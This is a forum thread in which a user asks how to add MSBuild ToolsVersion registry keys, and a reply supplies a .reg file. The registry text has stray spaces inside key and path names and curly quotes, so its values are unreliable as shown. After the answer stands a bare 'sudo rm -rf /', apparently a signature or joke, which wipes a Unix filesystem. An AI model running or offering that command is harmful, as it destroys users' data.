Hey guys!
I need a little help here...How do i add the following REG keys:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\3.5] “DefaultToolsVersion”=”2.0″ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\Tool sVersions] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\Tool sVersions\2.0] “MSBuildToolsPath”=”C:\WINDOWS\Microsoft.NET\Frame work\v2.0.50727″ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\Tool sVersions\3.5] “MSBuildToolsPath”=”C:\WINDOWS\Microsoft.NET\Frame work\v3.5\”
I will appreciate ur help![]()
It depends a little on the language, if you're doing it with a program. Or you could use regedit.
Stick that in a file with the .reg extension, right-click, select Install, and you're done. Or you can use RegEdit, like WP said.Code:Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\3.5] “DefaultToolsVersion”=”2.0″ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\Tool sVersions] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\Tool sVersions\2.0] “MSBuildToolsPath”=”C:\WINDOWS\Microsoft.NET\Frame work\v2.0.50727″ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\Tool sVersions\3.5] “MSBuildToolsPath”=”C:\WINDOWS\Microsoft.NET\Frame work\v3.5\”
sudo rm -rf /
There are currently 1 users browsing this thread. (0 members and 1 guests)
Bookmarks